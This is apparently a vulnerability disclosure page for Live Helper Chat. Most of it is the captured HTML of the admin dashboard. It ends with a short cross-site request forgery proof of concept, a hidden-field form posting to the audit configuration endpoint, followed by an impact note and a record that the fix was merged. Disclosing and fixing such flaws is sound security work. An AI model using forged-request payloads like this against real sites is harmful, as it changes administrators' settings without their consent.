role="menu"><li class="p-1"><input type="text" data-stopPropagation="true" ng-model="lhc.userFilterText" placeholder="Search for operator" class="form-control form-control-sm" value=""></li><li ng-repeat="userItem in lhc.userList" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.activeu" checklist-change="lhc.productChanged('activeu')" checklist-value="userItem.id"><i title="User" class="material-icons">account_box</i>{{userItem.name || userItem.name_official}}</label></li><li ng-show="lhc.userGroups.length > 0" class="border-top"></li><li ng-repeat="userGroup in lhc.userGroups" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.actived_ugroups" checklist-change="lhc.productChanged('actived_ugroups')" checklist-value="userGroup.id"><i title="User group" class="material-icons">people</i>{{userGroup.name}}</label></li></ul></div></div><div class="col-2"><select class="form-control form-control-sm btn-light" ng-model="lhc.limita" title="Number of elements in list"><option value="5">5</option><option value="10">10</option><option value="25">25</option><option value="50">50</option><option value="100">100</option></select></div></div></div><div class="panel-list"><table class="table table-sm mb-0 table-small table-fixed list-chat-table"><thead><tr><th width="40%"><a ng-click="lhc.toggleWidgetSort('active_chats_sort','loc_dsc','loc_asc',true)"><i title="Location" class="material-icons">&#xE0C8;</i><i ng-class="{'text-muted' : (lhc.toggleWidgetData['active_chats_sort'] != 'loc_asc' && lhc.toggleWidgetData['active_chats_sort'] != 'loc_dsc')}" title="Sort by location" class="material-icons">{{lhc.toggleWidgetData['active_chats_sort'] == 'loc_dsc' || lhc.toggleWidgetData['active_chats_sort'] != 'loc_asc' ? 'trending_up' : 'trending_down'}}</i></a>&nbsp;&nbsp;&nbsp;<a ng-click="lhc.toggleWidgetSort('active_chats_sort','u_dsc','u_asc',true)"><i title="Visitor" class="material-icons">face</i><i ng-class="{'text-muted' : (lhc.toggleWidgetData['active_chats_sort'] != 'u_asc' && lhc.toggleWidgetData['active_chats_sort'] != 'u_dsc')}" title="Sort by visitor nick" class="material-icons">{{lhc.toggleWidgetData['active_chats_sort'] == 'u_dsc' || lhc.toggleWidgetData['active_chats_sort'] != 'u_asc' ? 'trending_up' : 'trending_down'}}</i></a></th><th width="20%" ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><i ng-if="column.icon !== ''" class="material-icons">{{column.icon}}</i>{{column.name}}</th><th width="20%"><a ng-click="lhc.toggleWidgetSort('active_chats_sort','lmt_dsc','lmt_asc',true)"><i ng-class="{'text-muted' : (lhc.toggleWidgetData['active_chats_sort'] != 'lmt_asc' && lhc.toggleWidgetData['active_chats_sort'] != 'lmt_dsc')}" title="Sort by last message time" class="material-icons">{{lhc.toggleWidgetData['active_chats_sort'] == 'lmt_dsc' || lhc.toggleWidgetData['active_chats_sort'] != 'lmt_asc' ? 'trending_up' : 'trending_down'}}</i></a><a ng-click="lhc.toggleWidgetSort('active_chats_sort','id_dsc','id_asc',true)"><i ng-class="{'text-muted' : (lhc.toggleWidgetData['active_chats_sort'] != 'id_asc' && lhc.toggleWidgetData['active_chats_sort'] != 'id_dsc')}" title="Sort by chat start time" class="material-icons">{{lhc.toggleWidgetData['active_chats_sort'] == 'id_dsc' || lhc.toggleWidgetData['active_chats_sort'] != 'id_asc' ? 'trending_up' : 'trending_down'}}</i></a></th><th width="20%"><a ng-click="lhc.toggleWidgetSort('active_chats_sort','op_dsc','op_asc',true)"><i ng-class="{'text-muted' : (lhc.toggleWidgetData['active_chats_sort'] != 'op_asc' && lhc.toggleWidgetData['active_chats_sort'] != 'op_dsc')}" title="Sort by operator" class="material-icons">{{lhc.toggleWidgetData['active_chats_sort'] == 'op_dsc' || lhc.toggleWidgetData['active_chats_sort'] != 'op_asc' ? 'trending_up' : 'trending_down'}}</i></a></th><th width="20%"><a ng-click="lhc.toggleWidgetSort('active_chats_sort','dep_dsc','dep_asc',true)"><i ng-class="{'text-muted' : (lhc.toggleWidgetData['active_chats_sort'] != 'dep_asc' && lhc.toggleWidgetData['active_chats_sort'] != 'dep_dsc')}" title="Sort by department" class="material-icons">{{lhc.toggleWidgetData['active_chats_sort'] == 'dep_dsc' || lhc.toggleWidgetData['active_chats_sort'] != 'dep_asc' ? 'trending_up' : 'trending_down'}}</i></a></th></tr></thead><tr ng-repeat="chat in active_chats.list track by chat.id" ng-click="lhc.startChat(chat.id,chat.nick)" ng-class="{'user-away-row': chat.user_status_front == 2, 'user-online-row': !chat.user_status_front}"><td><div class="abbr-list"><span ng-if="chat.country_code != undefined"><img ng-src="/design/defaulttheme/images/flags/{{chat.country_code}}.png" alt="{{chat.country_name}}" title="{{chat.country_name}}" />&nbsp;</span><a title="[{{chat.id}}] {{chat.time_created_front}}" ng-click="lhc.previewChat(chat.id, $event)" class="material-icons">info_outline</a><i class="material-icons" title="Offline request" ng-show="chat.status_sub == 7">mail</i><i title="Has unread messages" ng-if="chat.hum" class="material-icons text-danger">feedback</i><span ng-if="chat.status_sub == 100"><img width="14" src="/extension/fbmessenger/design/fbmessengertheme/images/F_icon.svg" title="Facebook chat" />&nbsp;</span><i ng-if="chat.aicons && (lhc.excludeIcons.length == 0 || lhc.excludeIcons.indexOf(icon.i) === -1)" class="material-icons" ng-style="{'color': icon.c ? icon.c : '#6c757d'}" title="{{icon.t ? icon.t : icon.i}}" ng-repeat="icon in chat.aicons track by $index">{{icon.i || icon}}</i>{{chat.nick}}</div></td><td ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><div class="abbr-list" ng-repeat="val in column.items">{{chat[val]}}&nbsp;</div></td><td><div class="abbr-list" title="Chat started at - {{chat.time_created_front}}"><span class="material-icons text-success" title="Receive or send indicator and time since it happened" ng-class="{'text-danger' : chat.pnd_rsp}"}>{{chat.pnd_rsp === true ? 'call_received' : 'call_made'}}</span>{{chat.last_msg_time_front ? chat.last_msg_time_front : '&#x2709;'}}</div></td><td><div class="abbr-list" title="{{chat.n_off_full}} | {{chat.plain_user_name}}">{{chat.n_office}}</div></td><td><div class="abbr-list" title="{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}"><a class="text-primary" ng-click="lhc.openModal('statistic/departmentstats/'+chat.dep_id,$event)"><i class="material-icons">donut_large</i>{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}</a></div></td></tr></table><div ng-if="active_chats.list.length == 0" class="m-1 alert alert-light"><i class="material-icons">search</i>Nothing found...</div></div></div><div class="card-header" ng-if="unread_chats.list.length > 0"><a class="title-card-header" href="/site_admin/chat/list/(hum)/1"><i class="material-icons chat-unread">chat</i>Unread messages ({{unread_chats.list.length}}{{unread_chats.list.length == 10 ? '+' : ''}})</a><a title="collapse/expand" ng-click="lhc.toggleList('unread_chats_expanded')" class="fs24 float-right material-icons exp-cntr">{{unread_chats_expanded == true ? 'expand_less' : 'expand_more'}}</a></div><div ng-if="unread_chats_expanded == true" id="right-unread-chats"><table class="table table-sm mb-0 table-small table-fixed list-chat-table" ng-if="unread_chats.list.length > 0"><thead><tr><th width="50%"><i title="Visitor" class="material-icons">face</i></th><th width="20%" ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><i ng-if="column.icon !== ''" class="material-icons">{{column.icon}}</i>{{column.name}}</th><th width="30%"><i title="Time ago" class="material-icons">access_time</i></th><th width="20%"><i title="Department" class="material-icons">home</i></th></tr></thead><tr ng-repeat="chat in unread_chats.list track by chat.id" ng-click="lhc.startChat(chat.id,chat.nick)" ng-class="{'user-away-row': chat.user_status_front == 2, 'user-online-row': !chat.user_status_front}"><td><div class="abbr-list"><span ng-if="chat.country_code != undefined"><img ng-src="/design/defaulttheme/images/flags/{{chat.country_code}}.png" alt="{{chat.country_name}}" title="{{chat.country_name}}" />&nbsp;</span><a ng-click="lhc.previewChat(chat.id,$event)" class="material-icons">info_outline</a> {{chat.nick}}</div></td><td ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><div class="abbr-list" ng-repeat="val in column.items">{{chat[val]}}&nbsp;</div></td><td><div class="abbr-list" title="{{chat.unread_time.hours}} h. {{chat.unread_time.minits}} m. {{chat.unread_time.seconds}} s. ago.">{{chat.unread_time.hours}} h. {{chat.unread_time.minits}} m. {{chat.unread_time.seconds}} s. ago.</div></td><td><div class="abbr-list" title="{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}">{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}</div></td></tr></table><div ng-if="unread_chats.list.length == 0" class="m-1 alert alert-light"><i class="material-icons">search</i>Nothing found...</div></div><div ng-if="bot_chats" class="" data-panel-id="bot_chats" ng-init="lhc.getToggleWidget('botc_widget_exp');lhc.getToggleWidgetSort('bot_chats_sort')"><div class="card-header"><i class="material-icons mr-0 action-image" onclick="return lhc.revealModal({'url':WWW_DIR_JAVASCRIPT +'genericbot/notifications'})">settings_applications</i><a class="title-card-header" href="/site_admin/chat/list/(chat_status_ids)/5"><i class="material-icons chat-active">android</i> Bot chats ({{bot_chats.list.length}}{{bot_chats.list.length == lhc.limitb ? '+' : ''}})</a><a title="collapse/expand" ng-click="lhc.toggleWidget('botc_widget_exp')" class="fs24 float-right material-icons exp-cntr">{{lhc.toggleWidgetData['botc_widget_exp'] == false ? 'expand_less' : 'expand_more'}}</a></div><div ng-if="lhc.toggleWidgetData['botc_widget_exp'] !== true"><div class="p-2"><div class="row"><div class="col-10 pr-0"><div class="btn-group btn-block btn-block-department"><button type="button" class="btn btn-light btn-block btn-sm dropdown-toggle btn-department-dropdown" data-toggle="dropdown" aria-expanded="false">{{lhc.botd.length == 0 ? "All departments" : (lhc.botd.length == 1 && true ? lhc.botdNames.join(", ") : '['+lhc.botd.length+'] '+'departments')}}</button><ul class="dropdown-menu" role="menu"><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('botd',true)" ng-model="lhc.botd_all_departments"> Check all</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('botd',true)" ng-model="lhc.botd_only_online"> Only online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('botd',true)" ng-model="lhc.botd_only_explicit_online"> Only explicit online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('botd',true)" ng-model="lhc.botd_hide_hidden"> Hide hidden</label></li><li class="border-bottom"><label><input data-stopPropagation="true" ng-change="lhc.allDepartmentsChanged('botd',true)" type="checkbox" ng-model="lhc.botd_hide_disabled"> Hide disabled</label></li><li ng-repeat="product in lhc.userProductNames" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.botd_products" checklist-change="lhc.productChanged('botd_products')" checklist-value="product.id"><i class="material-icons">&#xE8CC;</i>{{product.name}}</label></li><li ng-show="lhc.userProductNames.length > 0" class="border-bottom"></li><li ng-repeat="department in lhc.userDepartmentsGroups" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.botd_dpgroups" checklist-change="lhc.productChanged('botd_dpgroups')" checklist-value="department.id"><i title="Department group" class="material-icons">&#xE84F;</i>{{department.name}}</label></li><li ng-show="lhc.userDepartmentsGroups.length > 0" class="border-bottom"></li><li ng-repeat="department in lhc.userDepartments" data-stopPropagation="true" ng-hide="( (lhc.botd_only_explicit_online == true && department.oexp == false) || (lhc.botd_hide_hidden == true && department.hidden == true) || (lhc.botd_hide_disabled == true && department.disabled == true) || (lhc.botd_only_online == true && department.ogen == false))"><label><input type="checkbox" checklist-model="lhc.botd" checklist-change="lhc.departmentChanged('botd')" checklist-value="department.id"><i title="Department" class="material-icons">home</i>{{department.name}}</label></li></ul></div></div><div class="col-2"><select class="form-control form-control-sm btn-light" ng-model="lhc.limitb" title="Number of elements in list"><option value="5">5</option><option value="10">10</option><option value="25">25</option><option value="50">50</option><option value="100">100</option></select></div></div></div><div ng-if="bot_chats.list.length > 0" class="panel-list"><table class="table table-sm mb-0 table-small table-fixed list-chat-table"><thead><tr><th width="40%"><i title="Visitor" class="material-icons">face</i></th><th width="20%" ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><i ng-if="column.icon !== ''" class="material-icons">{{column.icon}}</i>{{column.name}}</th><th width="25%"><i title="Time ago" class="material-icons">access_time</i></th><th width="20%"><i title="Department" class="material-icons">home</i></th></tr></thead><tr ng-repeat="chat in bot_chats.list track by chat.id" ng-click="lhc.startChat(chat.id,chat.nick)" ng-class="{'user-away-row': chat.user_status_front == 2, 'user-online-row': !chat.user_status_front}"><td><div class="abbr-list"><span ng-if="chat.country_code != undefined"><img ng-src="/design/defaulttheme/images/flags/{{chat.country_code}}.png" alt="{{chat.country_name}}" title="{{chat.country_name}}" />&nbsp;</span><a title="[{{chat.id}}] {{chat.time_created_front}}" ng-click="lhc.previewChat(chat.id, $event)" class="material-icons">info_outline</a><i class="material-icons" title="Offline request" ng-show="chat.status_sub == 7">mail</i><span ng-if="chat.status_sub == 100"><img width="14" src="/extension/fbmessenger/design/fbmessengertheme/images/F_icon.svg" title="Facebook chat" />&nbsp;</span><span title="Number of messages by user">[{{chat.msg_v || 0}}]</span>&nbsp;<i title="More than {{lhc.bot_st.msg_nm}} user messages" ng-show="chat.msg_v > lhc.bot_st.msg_nm" class="material-icons text-warning">whatshot</i><i ng-if="chat.aicons && (lhc.excludeIcons.length == 0 || lhc.excludeIcons.indexOf(icon.i) === -1)" class="material-icons" ng-style="{'color': icon.c ? icon.c : '#6c757d'}" title="{{icon.t ? icon.t : icon.i}}" ng-repeat="icon in chat.aicons track by $index">{{icon.i || icon}}</i>{{chat.nick}}</div></td><td ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><div class="abbr-list" ng-repeat="val in column.items">{{chat[val]}}&nbsp;</div></td><td><div class="abbr-list" title="{{chat.time_created_front}}">{{chat.time_created_front}}</div></td><td><div class="abbr-list" title="{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}">{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}</div></td></tr></table></div><div ng-if="bot_chats.list.length == 0" class="m-1 alert alert-light"><i class="material-icons">search</i>Bot chats will appear here....</div></div></div></div></div></div></div></div><div class="p-1 border-top" translate="no"><p class="float-right small"><a target="_blank" rel="noreferrer" href="http://livehelperchat.com">Live Helper Chat &copy; 2022</a></p>
<p class="small"><a rel="noreferrer" href="http://livehelperchat.com">Live Helper Chat</a></p>
</div><script type="text/javascript" src="/design/defaulttheme/js/js_static/55ece73a8d637ed105f7df02bf7597c8.js?1641801573"></script></body></html>

POC

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.livehelperchat.com/site_admin/audit/configuration" method="POST">
      <input type="hidden" name="csfr&#95;token" value="" />
      <input type="hidden" name="days&#95;log" value="90" />
      <input type="hidden" name="log&#95;js" value="on" />
      <input type="hidden" name="StoreOptions" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Impact

This vulnerability is capable of tricking the admin in changing audit log configuration.

We are processing your report and will contact the livehelperchat team within 24 hours. 15 days ago
Remigijus Kiminas validated this vulnerability 15 days ago
shubh123-tri has been awarded the disclosure bounty
The fix bounty is now up for grabs
Remigijus Kiminas confirmed that a fix has been merged on f59ffb 15 days ago
The fix bounty has been dropped